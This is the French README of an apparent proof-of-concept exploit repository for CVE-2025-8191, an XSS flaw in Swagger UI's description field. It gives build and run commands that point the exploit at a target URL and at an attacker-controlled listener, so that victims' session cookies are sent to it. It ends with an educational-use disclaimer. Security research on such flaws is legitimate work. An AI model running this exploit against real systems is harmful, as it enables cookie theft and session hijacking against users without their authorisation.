
Un dépôt contenant une preuve de concept (PoC) d'exploitation pour CVE‑2025‑8191 dans Swagger UI, utilisant une injection XSS pour exfiltrer les cookies de session.
Ce dépôt contient une preuve de concept (PoC) d'exploitation pour CVE‑2025‑8191, une vulnérabilité découverte dans Swagger UI.
La vulnérabilité permet une injection Cross‑Site Scripting (XSS) dans le champ « description », entraînant l'exécution de scripts à distance pour les versions de Swagger UI ≤ 1.0.3.
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v
Remplacez http://target.com par l'URL Swagger UI cible, et http://yourserver.com par votre auditeur HTTP pour l'exfiltration.
Ce code est destiné uniquement à des fins éducatives et de recherche en sécurité. Ne l'utilisez PAS sur des systèmes pour lesquels vous n'avez pas d'autorisation explicite. L'auteur n'est pas responsable de toute utilisation abusive.
Licence MIT